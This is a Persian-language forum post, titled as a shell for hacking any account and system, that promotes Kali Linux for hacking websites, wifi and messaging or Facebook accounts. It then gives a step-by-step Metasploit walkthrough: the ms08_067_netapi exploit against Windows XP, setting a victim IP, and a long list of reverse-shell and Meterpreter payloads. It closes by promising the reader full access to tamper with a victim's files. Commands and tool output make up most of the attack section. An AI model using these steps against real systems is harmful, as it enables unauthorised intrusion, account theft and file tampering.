برا تو
برا تو

امتیاز موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
کلمات کلیدی
shell برای هک هر اکانت و سیستمی

shell برای هک هر اکانت و سیستمی
#1
سیستم عامل kali linux
(++Text by silent(c
لیکه دانلود:
برای مشاهده لینک باید عضو شوید یا وارد شوید

کاربرد های کالی لینوکس:
1.هک وب سایت
2.هک وبلاگ
3.برسی باگ های exploitوsql
4.هک شبکه های وایرلس(wifi)
5.هک اکانت(لاین. وایبر.facebookو…)
6.ساختshellبرای هک pc
7.ساخت(shell (c100 برای هک گالری و…
این سیستم عامل رو نسخه 32 بیتی را دانلود کنین
کالی رو هم میتونید کنار ویندوز خود اجرا کنید
و هم میتونید در ماشین مجازی اجرا کنید
دوستانی ک میخان تو ماشین مجازی اجرا کنن باید از گوگل یک ماشین مجازی هم دانلود کنن

هک با کالی لینوکس

قبل از شروع VMWARE را باز کرده و هر دو ماشین حمله و دفاع را پلی و با یوزر و پسورد به سیستم عامل کالی و Windows XP وارد شوید

Service postgresql start

Service postgresql start

باید از یکی از رابط های کاربری یا به اصطلاح فریم ورک های آن مانند MsfConsole (رابط کاربری بر مبنای متن) و یا Msfcli (بر مبنای دستور) استفاده کنیم
دستور زیر را برای اجرای رابط کاربری متا اسپلویت وارد می کنید

root@kali:~# msfconsole

در هر مرحله برای خروج از رابط کاربری از دستور Exit استفاده کنید
حالا باید یک نقطه ضعف روی ماشین مجازیه قربانی پیدا کنین
نقطه ضعف ویندوزxp
ms08-067
هست. حالا باید یک mazhoualمناسب پیدا کنیم ک با ایتفاده از دستور serchان را پیدا میکنیم ماننده

exploit/windows/smb/ms08_067_netapi

حالا با دستور زیر وارد شوید

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
دستور زیرا برای انتخاب حمله وارد کنین

msf exploit(ms08_067_netapi) > show options

همون ای پی ماشینه مورده نظره Remote Host
با دستور زیر ای پی ماشین مورده نظر رو تغییر دهید

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.4

حالا باید ماشینو تغییر بدید برای تغیر دادن دستور زیر را وارد کنین

Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)
4 Windows XP SP2 English (NX)
5 Windows XP SP3 English (AlwaysOn NX)
6 Windows XP SP3 English (NX)
-- بریده شده به علت کبود جا --
59 Windows XP SP3 Portuguese (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)
64 Windows 2003 SP1 Spanish (NO NX)
65 Windows 2003 SP1 Spanish (NX)
66 Windows 2003 SP2 Spanish (NO )NX
67 Windows 2003 SP2 Spanish (NX)
برای تعیینpayloadدستور زیر. را وارد کنین


msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective DLL Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http normal Reflective DLL Injection, Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS)
windows/dns_txt_query_exec normal DNS TXT Record Payload Download and Execution
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/meterpreter/reverse_ipv6_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
windows/meterpreter وreverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager ()IPv6
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
حالا شما با موفقیت یکshellساختیت با استفاده از ان میتوانید ب همه فایل ها نفوذ کرده و ان هارو دست کاری کنین
برای تشکر از نویسنده روی سپاس کلیک کنید
پاسخ }}}}
سپاس شده توسط:


پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان